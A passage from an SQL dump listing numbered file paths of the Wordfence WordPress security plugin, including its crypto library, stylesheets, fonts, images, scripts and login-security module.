ve25519/Ge/Precomp.php'),(5881,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(5882,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(5883,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(5884,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(5885,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(5886,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(5887,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(5888,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(5889,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(5890,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(5891,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(5892,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(5893,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(5894,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(5895,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(5896,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(5897,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(5898,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(5899,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(5900,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(5901,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(5902,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(5903,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(5904,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(5905,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(5906,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(5907,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(5908,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(5909,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(5910,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(5911,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(5912,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(5913,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(5914,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(5915,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(5916,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(5917,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(5918,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(5919,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(5920,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(5921,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(5922,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(5923,'wp-content/plugins/wordfence/css/activity-report-widget.1566486436.css'),(5924,'wp-content/plugins/wordfence/css/diff.1566486436.css'),(5925,'wp-content/plugins/wordfence/css/dt_table.1566486436.css'),(5926,'wp-content/plugins/wordfence/css/fullLog.1566486436.css'),(5927,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(5928,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(5929,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(5930,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(5931,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(5932,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(5933,'wp-content/plugins/wordfence/css/iptraf.1566486436.css'),(5934,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1566486436.css'),(5935,'wp-content/plugins/wordfence/css/jquery-ui.min.1566486436.css'),(5936,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1566486436.css'),(5937,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1566486436.css'),(5938,'wp-content/plugins/wordfence/css/main.1566486436.css'),(5939,'wp-content/plugins/wordfence/css/phpinfo.1566486436.css'),(5940,'wp-content/plugins/wordfence/css/wf-adminbar.1566486436.css'),(5941,'wp-content/plugins/wordfence/css/wf-colorbox.1566486436.css'),(5942,'wp-content/plugins/wordfence/css/wf-font-awesome.1566486436.css'),(5943,'wp-content/plugins/wordfence/css/wf-global.1566486436.css'),(5944,'wp-content/plugins/wordfence/css/wf-ionicons.1566486436.css'),(5945,'wp-content/plugins/wordfence/css/wf-onboarding.1566486436.css'),(5946,'wp-content/plugins/wordfence/css/wf-roboto-font.1566486436.css'),(5947,'wp-content/plugins/wordfence/css/wfselect2.min.1566486436.css'),(5948,'wp-content/plugins/wordfence/css/wordfenceBox.1566486436.css'),(5949,'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),(5950,'wp-content/plugins/wordfence/fonts/ionicons.woff'),(5951,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),(5952,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),(5953,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),(5954,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),(5955,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),(5956,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),(5957,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),(5958,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),(5959,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),(5960,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),(5961,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(5962,'wp-content/plugins/wordfence/images/2fa1.svg'),(5963,'wp-content/plugins/wordfence/images/2fa2.svg'),(5964,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(5965,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(5966,'wp-content/plugins/wordfence/images/blocking.svg'),(5967,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(5968,'wp-content/plugins/wordfence/images/checkbox.png'),(5969,'wp-content/plugins/wordfence/images/flags.png'),(5970,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(5971,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(5972,'wp-content/plugins/wordfence/images/help.png'),(5973,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(5974,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(5975,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(5976,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(5977,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(5978,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(5979,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(5980,'wp-content/plugins/wordfence/images/icons/email_go.png'),(5981,'wp-content/plugins/wordfence/images/icons/error128.png'),(5982,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(5983,'wp-content/plugins/wordfence/images/icons/tick128.png'),(5984,'wp-content/plugins/wordfence/images/icons/warning128.png'),(5985,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(5986,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(5987,'wp-content/plugins/wordfence/images/loading.gif'),(5988,'wp-content/plugins/wordfence/images/loading_background.png'),(5989,'wp-content/plugins/wordfence/images/loading_large.gif'),(5990,'wp-content/plugins/wordfence/images/logo.png'),(5991,'wp-content/plugins/wordfence/images/options.svg'),(5992,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(5993,'wp-content/plugins/wordfence/images/sort_asc.gif'),(5994,'wp-content/plugins/wordfence/images/sort_asc.png'),(5995,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(5996,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(5997,'wp-content/plugins/wordfence/images/sort_both.gif'),(5998,'wp-content/plugins/wordfence/images/sort_both.png'),(5999,'wp-content/plugins/wordfence/images/sort_desc.gif'),(6000,'wp-content/plugins/wordfence/images/sort_desc.png'),(6001,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(6002,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(6003,'wp-content/plugins/wordfence/images/support.svg'),(6004,'wp-content/plugins/wordfence/images/tools.svg'),(6005,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(6006,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(6007,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(6008,'wp-content/plugins/wordfence/index.php'),(6009,'wp-content/plugins/wordfence/js/Chart.bundle.min.1566486436.js'),(6010,'wp-content/plugins/wordfence/js/admin.1566486436.js'),(6011,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1566486436.js'),(6012,'wp-content/plugins/wordfence/js/admin.liveTraffic.1566486436.js'),(6013,'wp-content/plugins/wordfence/js/date.1566486436.js'),(6014,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1566486436.js'),(6015,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1566486436.js'),(6016,'wp-content/plugins/wordfence/js/jquery.colorbox.1566486436.js'),(6017,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1566486436.js'),(6018,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1566486436.js'),(6019,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1566486436.js'),(6020,'wp-content/plugins/wordfence/js/jquery.tools.min.1566486436.js'),(6021,'wp-content/plugins/wordfence/js/knockout-3.3.0.1566486436.js'),(6022,'wp-content/plugins/wordfence/js/wfdashboard.1566486436.js'),(6023,'wp-content/plugins/wordfence/js/wfdropdown.1566486436.js'),(6024,'wp-content/plugins/wordfence/js/wfglobal.1566486436.js'),(6025,'wp-content/plugins/wordfence/js/wfpopover.1566486436.js'),(6026,'wp-content/plugins/wordfence/js/wfselect2.min.1566486436.js'),(6027,'wp-content/plugins/wordfence/lib/.htaccess'),(6028,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(6029,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(6030,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(6031,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(6032,'wp-content/plugins/wordfence/lib/Diff.php'),(6033,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(6034,'wp-content/plugins/wordfence/lib/IPTraf.php'),(6035,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(6036,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(6037,'wp-content/plugins/wordfence/lib/compat.php'),(6038,'wp-content/plugins/wordfence/lib/conntest.php'),(6039,'wp-content/plugins/wordfence/lib/cronview.php'),(6040,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(6041,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(6042,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(6043,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(6044,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(6045,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(6046,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(6047,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(6048,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(6049,'wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php'),(6050,'wp-content/plugins/wordfence/lib/dbview.php'),(6051,'wp-content/plugins/wordfence/lib/diffResult.php'),(6052,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(6053,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(6054,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(6055,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(6056,'wp-content/plugins/wordfence/lib/flags.php'),(6057,'wp-content/plugins/wordfence/lib/live_activity.php'),(6058,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(6059,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(6060,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(6061,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(6062,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(6063,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(6064,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(6065,'wp-content/plugins/wordfence/lib/menu_options.php'),(6066,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(6067,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(6068,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(6069,'wp-content/plugins/wordfence/lib/menu_support.php'),(6070,'wp-content/plugins/wordfence/lib/menu_tools.php'),(6071,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(6072,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(6073,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(6074,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(6075,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(6076,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(6077,'wp-content/plugins/wordfence/lib/noc1.key'),(6078,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(6079,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(6080,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(6081,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(6082,'wp-content/plugins/wordfence/lib/sysinfo.php'),(6083,'wp-content/plugins/wordfence/lib/unknownFiles.php'),(6084,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(6085,'wp-content/plugins/wordfence/lib/wf503.php'),(6086,'wp-content/plugins/wordfence/lib/wfAPI.php'),(6087,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(6088,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(6089,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(6090,'wp-content/plugins/wordfence/lib/wfArray.php'),(6091,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(6092,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(6093,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(6094,'wp-content/plugins/wordfence/lib/wfCache.php'),(6095,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(6096,'wp-content/plugins/wordfence/lib/wfConfig.php'),(6097,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(6098,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(6099,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(6100,'wp-content/plugins/wordfence/lib/wfDB.php'),(6101,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(6102,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(6103,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(6104,'wp-content/plugins/wordfence/lib/wfDict.php'),(6105,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(6106,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(6107,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(6108,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(6109,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(6110,'wp-content/plugins/wordfence/lib/wfIssues.php'),(6111,'wp-content/plugins/wordfence/lib/wfJWT.php'),(6112,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(6113,'wp-content/plugins/wordfence/lib/wfLog.php'),(6114,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(6115,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(6116,'wp-content/plugins/wordfence/lib/wfNotification.php'),(6117,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(6118,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(6119,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(6120,'wp-content/plugins/wordfence/lib/wfScan.php'),(6121,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(6122,'wp-content/plugins/wordfence/lib/wfSchema.php'),(6123,'wp-content/plugins/wordfence/lib/wfStyle.php'),(6124,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(6125,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(6126,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(6127,'wp-content/plugins/wordfence/lib/wfUtils.php'),(6128,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(6129,'wp-content/plugins/wordfence/lib/wfView.php'),(6130,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(6131,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(6132,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(6133,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(6134,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(6135,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(6136,'wp-content/plugins/wordfence/models/.htaccess'),(6137,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(6138,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(6139,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(6140,'wp-content/plugins/wordfence/models/common/wfTab.php'),(6141,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(6142,'wp-content/plugins/wordfence/models/page/wfPage.php'),(6143,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(6144,'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),(6145,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(6146,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(6147,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(6148,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(6149,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(6150,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(6151,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(6152,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(6153,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(6154,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(6155,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(6156,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(6157,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(6158,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(6159,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(6160,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(6161,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(6162,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(6163,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(6164,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(6165,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(6166,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(6167,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(6168,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(6169,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(6170,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(6171,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(6172,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(6173,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(6174,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(6175,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(6176,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1566486436.css'),(6177,'wp-content/plugins/wordfence/modules/login-security/css/admin.1566486436.css'),(6178,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1566486436.css'),(6179,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1566486436.css'),(6180,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1566486436.css'),(6181,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1566486436.css'),(6182,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1566486436.css'),(6183,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1566486436.css'),(6184,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1566486436.css'),(6185,'wp-content/plugins/wordfence/modules/login-security/css/login.1566486436.css'),(6186,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(6187,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(6188,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(6189,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(6190,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(6191,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(6192,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(6193,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(6194,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(6195,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(6196,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(6197,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1566486436.js'),(6198,'wp-content/plugins/wordfence/modules/login-security/js/admin.1566486436.js'),(6199,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1566486436.js'),(6200,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1566486436.js'),(6201,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1566486436.js'),(6202,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1566486436.js'),(6203,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1566486436.js'),(6204,'wp-content/plugins/wordfence/modules/login-security/js/login.1566486436.js'),(6205,'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(6206,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(6207,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(6208,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(6209,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(6210,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(6211,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(6212,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(6213,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(6214,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(6215,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(6216,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(6217,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(6218,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(6219,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(6220,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(6221,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(6222,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(6223,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(6224,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(6225,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(6226,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(6227,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(6228,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(6229,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(6230,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(6231,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(6232,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(6233,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(6234,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(6235,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(6236,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(6237,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(6238,'wp-content/plugins/wordfence/readme.txt'),(6239,'wp-content/plugins/wordfence/tmp/.htaccess'),(6240,'wp-content/plugins/wordfence/vendor/.htaccess'),(6241,'wp-content/plugins/wordfence/vendor/autoload.php'),(6242,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(6243,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(6244,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(6245,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(6246,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(6247,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(6248,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(6249,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(6250,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(6251,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(6252,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(6253,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(6254,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(6255,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(6256,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(6257,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(6258,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(6259,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(6260,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(6261,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(6262,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(6263,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(6264,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(6265,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(6266,'wp-cont